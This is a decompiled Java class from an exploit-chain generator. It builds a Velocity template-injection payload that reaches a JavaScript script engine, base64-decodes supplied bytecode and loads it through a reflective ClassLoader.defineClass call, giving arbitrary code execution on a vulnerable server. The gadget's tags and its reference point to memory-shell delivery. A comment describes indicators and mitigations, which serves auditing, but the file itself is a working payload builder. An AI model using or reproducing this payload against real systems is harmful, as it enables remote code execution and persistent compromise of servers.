package com.ar3h.chains.gadget.impl.common.expression;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "velocity表达式js加载字节码", description = "velocity 调用 js 实现执行字节码\nReference: https://github.com/ReaJason/MemShellParty", dependencies = {"velocity", "js"}, authors = {Authors.ReaJason})
@GadgetTags(tags = {Tag.Thymeleaf_Expr, Tag.Expression}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/expression/VelocityConvert2.class */
/**
 * Gadget that renders a Velocity template string (the {@code Expression} stage of a chain).
 *
 * <p>The emitted template starts from an empty String literal, reaches {@code Class.forName} through
 * {@code $x.class}, instantiates {@code javax.script.ScriptEngineManager}, takes the {@code js} engine and
 * evaluates a script that base64-decodes the supplied bytes and defines/instantiates them through a
 * reflective, {@code setAccessible(true)} call to {@code ClassLoader.defineClass}.
 *
 * <p>Defensive reading: this is the shape of payload to look for when auditing any application that
 * renders Velocity templates built from untrusted input. Indicators in template text are {@code .class.forName},
 * {@code ScriptEngineManager} and {@code defineClass}. The mitigation is to never render user-controlled
 * template text, and otherwise to configure Velocity's {@code SecureUberspector}
 * ({@code runtime.introspector.uberspect}), which denies access to {@code Class}/{@code ClassLoader}
 * methods from templates; a runtime without a {@code js} script engine also breaks this particular path.
 *
 * <p>Decompiled class; {@code velocityTemplate2} is a public, non-final static and can be reassigned by
 * any caller.
 */
public class VelocityConvert2 implements Gadget {
    // Format string with two %s placeholders: first the class name, then the base64 bytecode (see getObject).
    public static String velocityTemplate2 = "#set($x='') #set($cz = $x.class.forName('javax.script.ScriptEngineManager')) $cz.getDeclaredConstructor(null).newInstance().getEngineByName('js').eval('var classLoader = java.lang.Thread.currentThread().getContextClassLoader();var className = \"%s\";var base64Str = \"%s\";try { classLoader.loadClass(className).newInstance();} catch (e) { var clsString = classLoader.loadClass(\"java.lang.String\"); var bytecode; try { var clsBase64 = classLoader.loadClass(\"java.util.Base64\"); var clsDecoder = classLoader.loadClass(\"java.util.Base64$Decoder\"); var decoder = clsBase64.getMethod(\"getDecoder\").invoke(base64Clz); bytecode = clsDecoder.getMethod(\"decode\", clsString).invoke(decoder, base64Str); } catch (ee) { try { var datatypeConverterClz = classLoader.loadClass(\"javax.xml.bind.DatatypeConverter\"); bytecode = datatypeConverterClz.getMethod(\"parseBase64Binary\", clsString).invoke(datatypeConverterClz, base64Str); } catch (eee) { var clazz1 = classLoader.loadClass(\"sun.misc.BASE64Decoder\"); bytecode = clazz1.newInstance().decodeBuffer(base64Str); } } var clsClassLoader = classLoader.loadClass(\"java.lang.ClassLoader\"); var clsByteArray = (new java.lang.String(\"a\").getBytes().getClass()); var clsInt = java.lang.Integer.TYPE; var defineClass = clsClassLoader.getDeclaredMethod(\"defineClass\", [clsByteArray, clsInt, clsInt]); defineClass.setAccessible(true); var clazz = defineClass.invoke(classLoader, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length)); clazz.newInstance();}')";

    /**
     * Fills the template with the class name and the base64 (commons-codec, standard alphabet) form of {@code bArr}.
     *
     * @param bArr class bytes to embed
     * @param str  fully qualified name of the class those bytes define
     * @return the rendered Velocity template text
     */
    private String getObject(byte[] bArr, String str) {
        return String.format(velocityTemplate2, str, Base64.encodeBase64String(bArr));
    }

    /**
     * Builds the template from the upstream chain result.
     *
     * <p>The upstream result is cast unchecked to {@code byte[]} (the chain is tagged to follow a
     * {@code BytecodeConvertTag} stage); a different type raises {@link ClassCastException}. The class name is
     * read from {@code ContextTag.CLASS_NAME_KEY}.
     *
     * @throws Exception whatever {@code gadgetChain.doCreate} propagates
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object doCreate = gadgetChain.doCreate(gadgetContext);
        return getObject((byte[]) doCreate, gadgetContext.getString(ContextTag.CLASS_NAME_KEY));
    }
}
